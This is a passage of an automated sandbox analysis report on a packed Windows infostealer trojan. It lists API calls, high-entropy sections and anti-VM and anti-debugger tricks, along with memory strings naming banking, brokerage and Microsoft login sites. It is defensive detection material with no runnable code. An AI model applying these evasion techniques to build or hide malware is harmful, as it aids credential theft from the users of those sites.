          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B782E0 NtWriteFile,0_2_00B782E0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B7827C NtSetInformationKey,0_2_00B7827C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B783F4 NtDuplicateObject,0_2_00B783F4
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B78338 NtQueryObject,0_2_00B78338
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B7836C NtQueryDirectoryFile,0_2_00B7836C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B7848C NtLockFile,0_2_00B7848C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B784EC NtUnlockFile,0_2_00B784EC
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B7843C NtQueryVolumeInformationFile,0_2_00B7843C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B7858C NtMapViewOfSection,0_2_00B7858C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B785EC NtCreateSection,0_2_00B785EC
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B78558 NtQuerySection,0_2_00B78558
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B78684 NtQueryInformationFile,0_2_00B78684
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B78778 NtOpenFile,0_2_00B78778
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77BB0 NtQueryInformationProcess,0_2_00B77BB0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77BE4 NtCreateThread,0_2_00B77BE4
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77B50 NtDeviceIoControlFile,0_2_00B77B50
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77CA0 NtCreateProcessEx,0_2_00B77CA0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77CF8 NtCreateUserProcess,0_2_00B77CF8
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77C50 NtCreateProcess,0_2_00B77C50
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77D8C NtSetVolumeInformationFile,0_2_00B77D8C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77DE0 NtQuerySecurityObject,0_2_00B77DE0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77D60 NtOpenKeyEx,0_2_00B77D60
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77E14 NtNotifyChangeDirectoryFile,0_2_00B77E14
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77E6C NtFsControlFile,0_2_00B77E6C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77FB4 NtQueryKey,0_2_00B77FB4
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77FE8 NtQueryValueKey,0_2_00B77FE8
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77F04 NtAccessCheck,0_2_00B77F04
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B77F74 NtEnumerateValueKey,0_2_00B77F74
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BD6CA4: CreateFileA,DeviceIoControl,0_2_00BD6CA4
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00ACEA600_2_00ACEA60
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B039200_2_00B03920
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00ADBBD00_2_00ADBBD0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B03CD00_2_00B03CD0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00ACA2C00_2_00ACA2C0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00AE62200_2_00AE6220
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BD62640_2_00BD6264
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BD66000_2_00BD6600
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BA482C0_2_00BA482C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00AC2AF00_2_00AC2AF0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00AE0AF00_2_00AE0AF0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00AC8AC00_2_00AC8AC0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00AE4A300_2_00AE4A30
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BD6A400_2_00BD6A40
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B88BB00_2_00B88BB0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B04C800_2_00B04C80
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B92C0C0_2_00B92C0C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00ADAD900_2_00ADAD90
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00AC6F960_2_00AC6F96
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B60FF00_2_00B60FF0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00AC10400_2_00AC1040
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00AD10500_2_00AD1050
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B054A00_2_00B054A0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00AC94E00_2_00AC94E0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B0B5D00_2_00B0B5D0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00AC35100_2_00AC3510
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B0B6700_2_00B0B670
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00AD77800_2_00AD7780
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B6B97C0_2_00B6B97C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BD3AC80_2_00BD3AC8
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00AD3A300_2_00AD3A30
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BB3C280_2_00BB3C28
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BD3D940_2_00BD3D94
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00AC7D800_2_00AC7D80
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00ACBD700_2_00ACBD70
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BD3F240_2_00BD3F24
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_032D58C80_2_032D58C8
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: String function: 00B29D9C appears 71 times
          Source: nvtoaldlrg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: nvtoaldlrg.exeStatic PE information: Section: ZLIB complexity 0.9996248570884146
          Source: nvtoaldlrg.exeStatic PE information: Section: ZLIB complexity 0.99658203125
          Source: nvtoaldlrg.exeStatic PE information: Section: ZLIB complexity 0.99390625
          Source: nvtoaldlrg.exeStatic PE information: Section: ZLIB complexity 0.9977022058823529
          Source: nvtoaldlrg.exeStatic PE information: Section: .data ZLIB complexity 0.9959839400245634
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/7
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: nvtoaldlrg.exe, 00000000.00000003.866156085.00000000044C3000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.866412146.0000000001516000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.842999188.00000000044A6000.00000004.00000800.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.842426263.00000000044C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: nvtoaldlrg.exeVirustotal: Detection: 58%
          Source: nvtoaldlrg.exeReversingLabs: Detection: 68%
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeFile read: C:\Users\user\Desktop\nvtoaldlrg.exeJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: nvtoaldlrg.exeStatic file information: File size 1311232 > 1048576

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeUnpacked PE file: 0.2.nvtoaldlrg.exe.ac0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
          Source: nvtoaldlrg.exeStatic PE information: section name:
          Source: nvtoaldlrg.exeStatic PE information: section name:
          Source: nvtoaldlrg.exeStatic PE information: section name:
          Source: nvtoaldlrg.exeStatic PE information: section name:
          Source: nvtoaldlrg.exeStatic PE information: section name:
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BC59C4 push 00BC5A51h; ret 0_2_00BC5A49
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B680BC push 00B680E8h; ret 0_2_00B680E0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BD00FC push 00BD0134h; ret 0_2_00BD012C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B680F4 push 00B68120h; ret 0_2_00B68118
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B34054 push 00B34080h; ret 0_2_00B34078
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B6C194 push 00B6C1CCh; ret 0_2_00B6C1C4
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BA0194 push 00BA01C0h; ret 0_2_00BA01B8
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B4A1DC push 00B4A26Ch; ret 0_2_00B4A264
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B4A12C push 00B4A1D7h; ret 0_2_00B4A1CF
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BAE160 push 00BAE18Ch; ret 0_2_00BAE184
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B8C290 push 00B8C2C3h; ret 0_2_00B8C2BB
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B8C2F0 push 00B8C31Ch; ret 0_2_00B8C314
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B3C3A0 push 00B3C400h; ret 0_2_00B3C3F8
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BD4394 push 00BD43C0h; ret 0_2_00BD43B8
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B8C394 push 00B8C3DFh; ret 0_2_00B8C3D7
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B8C33C push 00B8C388h; ret 0_2_00B8C380
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BCE47C push 00BCE4C8h; ret 0_2_00BCE4C0
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B4E5C4 push 00B4E5F0h; ret 0_2_00B4E5E8
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B8A578 push ecx; mov dword ptr [esp], ecx0_2_00B8A57D
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B3C578 push 00B3C5A4h; ret 0_2_00B3C59C
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BAC55C push 00BAC5B6h; ret 0_2_00BAC5AE
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B3A6A4 push 00B3A74Ch; ret 0_2_00B3A744
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B3C684 push ecx; mov dword ptr [esp], ecx0_2_00B3C687
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BB46DC push 00BB4747h; ret 0_2_00BB473F
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B3A62C push 00B3A6A2h; ret 0_2_00B3A69A
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B3C664 push ecx; mov dword ptr [esp], ecx0_2_00B3C667
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B4A784 push 00B4A7B0h; ret 0_2_00B4A7A8
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B4A7D4 push 00B4A817h; ret 0_2_00B4A80F
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BD4730 push 00BD475Ch; ret 0_2_00BD4754
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B3A770 push 00B3A79Ch; ret 0_2_00B3A794
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BD4768 push 00BD4794h; ret 0_2_00BD478C
          Source: nvtoaldlrg.exeStatic PE information: section name: entropy: 7.998779735129503
          Source: nvtoaldlrg.exeStatic PE information: section name: entropy: 7.928958124958163
          Source: nvtoaldlrg.exeStatic PE information: section name: entropy: 7.974744623175405
          Source: nvtoaldlrg.exeStatic PE information: section name: entropy: 7.970326652039579
          Source: nvtoaldlrg.exeStatic PE information: section name: .data entropy: 7.974703529943176
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
          Query firmware table information (likely to detect VMs)
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeWindow / User API: threadDelayed 711Jump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe TID: 7132Thread sleep count: 711 > 30Jump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe TID: 7152Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exe TID: 6352Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B50490 FindFirstFileW,0_2_00B50490
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
          Source: nvtoaldlrg.exe, 00000000.00000002.1046759978.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000002.1046723334.0000000001455000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.994650409.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.923936426.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.921555375.000000000148F000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1045742040.0000000001454000.00000004.00000020.00020000.00000000.sdmp, nvtoaldlrg.exe, 00000000.00000003.1021479952.000000000148F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000C69000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000C69000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000B1F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
          Source: nvtoaldlrg.exe, 00000000.00000002.1045933046.0000000000C69000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
          Source: nvtoaldlrg.exe, 00000000.00000003.866528944.00000000044F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Hides threads from debuggers
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B09630 LdrInitializeThunk,0_2_00B09630
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_032D8094 mov eax, dword ptr fs:[00000030h]0_2_032D8094
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_032D7DCA mov eax, dword ptr fs:[00000030h]0_2_032D7DCA
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00BD5268 cpuid 0_2_00BD5268
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\nvtoaldlrg.exeCode function: 0_2_00B76CC0 GetTimeZoneInformation,0_2_00B76CC0
